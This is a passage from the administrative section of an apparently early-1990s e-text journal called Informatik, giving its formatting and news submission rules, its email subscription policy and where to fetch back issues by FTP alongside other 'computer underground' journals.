mixed case type * single spaced, double space between paragraphs * no pagination News submissions ~~~~~~~~~~~~~~~ * Submit only recent news items * Include the headline or title of the article the author's name (if given) the publication of origin the date of publication * Don't submit news that has appeared in other e-text journals Subscription policy ~~~~~~~~~~~~~~~~~~ We are happy to provide an Internet based subscription service to our readers. To be on our mailout list, send mail to our Internet address, "inform@doc.cc.utexas.edu" and include the word subscription in the subject of your message. If you requested a subscription before, you need to reply again, because the old subscription list was deleted by MH. Back Issues ~~~~~~~~~~ Back issues of Informatik are available via ftp at ftp.eff.org in the /pub/cud/inform directory. The site also contains a plethora of other electronic texts of interest to the "computer underground" community including Phrack, NIA, PHUN, and the LOD tech journals.